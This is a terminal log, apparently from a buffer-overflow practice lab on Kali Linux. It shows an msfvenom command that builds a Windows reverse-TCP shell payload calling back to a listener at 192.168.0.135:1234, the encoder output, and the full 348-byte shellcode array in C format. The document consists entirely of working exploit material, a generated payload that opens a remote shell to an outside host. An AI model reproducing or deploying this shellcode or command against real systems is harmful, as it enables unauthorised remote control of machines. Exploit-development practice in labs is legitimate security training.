msfvenom -p windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c  -b "\x00\x00\xa"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1488 bytes
unsigned char buf[] = 
"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xfa\x33\xee\x92\x83\xee\xfc\xe2\xf4\x06\xdb\x6c\x92\xfa\x33"
"\x8e\x1b\x1f\x02\x2e\xf6\x71\x63\xde\x19\xa8\x3f\x65\xc0\xee"
"\xb8\x9c\xba\xf5\x84\xa4\xb4\xcb\xcc\x42\xae\x9b\x4f\xec\xbe"
"\xda\xf2\x21\x9f\xfb\xf4\x0c\x60\xa8\x64\x65\xc0\xea\xb8\xa4"
"\xae\x71\x7f\xff\xea\x19\x7b\xef\x43\xab\xb8\xb7\xb2\xfb\xe0"
"\x65\xdb\xe2\xd0\xd4\xdb\x71\x07\x65\x93\x2c\x02\x11\x3e\x3b"
"\xfc\xe3\x93\x3d\x0b\x0e\xe7\x0c\x30\x93\x6a\xc1\x4e\xca\xe7"
"\x1e\x6b\x65\xca\xde\x32\x3d\xf4\x71\x3f\xa5\x19\xa2\x2f\xef"
"\x41\x71\x37\x65\x93\x2a\xba\xaa\xb6\xde\x68\xb5\xf3\xa3\x69"
"\xbf\x6d\x1a\x6c\xb1\xc8\x71\x21\x05\x1f\xa7\x5b\xdd\xa0\xfa"
"\x33\x86\xe5\x89\x01\xb1\xc6\x92\x7f\x99\xb4\xfd\xcc\x3b\x2a"
"\x6a\x32\xee\x92\xd3\xf7\xba\xc2\x92\x1a\x6e\xf9\xfa\xcc\x3b"
"\xc2\xaa\x63\xbe\xd2\xaa\x73\xbe\xfa\x10\x3c\x31\x72\x05\xe6"
"\x79\xf8\xff\x5b\x2e\x3a\xfa\xb4\x86\x90\xfa\x37\x3c\x1b\x1c"
"\x59\xfe\xc4\xad\x5b\x77\x37\x8e\x52\x11\x47\x7f\xf3\x9a\x9e"
"\x05\x7d\xe6\xe7\x16\x5b\x1e\x27\x58\x65\x11\x47\x92\x50\x83"
"\xf6\xfa\xba\x0d\xc5\xad\x64\xdf\x64\x90\x21\xb7\xc4\x18\xce"
"\x88\x55\xbe\x17\xd2\x93\xfb\xbe\xaa\xb6\xea\xf5\xee\xd6\xae"
"\x63\xb8\xc4\xac\x75\xb8\xdc\xac\x65\xbd\xc4\x92\x4a\x22\xad"
"\x7c\xcc\x3b\x1b\x1a\x7d\xb8\xd4\x05\x03\x86\x9a\x7d\x2e\x8e"
"\x6d\x2f\x88\x0e\x8f\xd0\x39\x86\x34\x6f\x8e\x73\x6d\x2f\x0f"
"\xe8\xee\xf0\xb3\x15\x72\x8f\x36\x55\xd5\xe9\x41\x81\xf8\xfa"
"\x60\x11\x47";
root@kali:~/Desktop/OCP/BufferOVer/dostackbufferoverflowgood# 

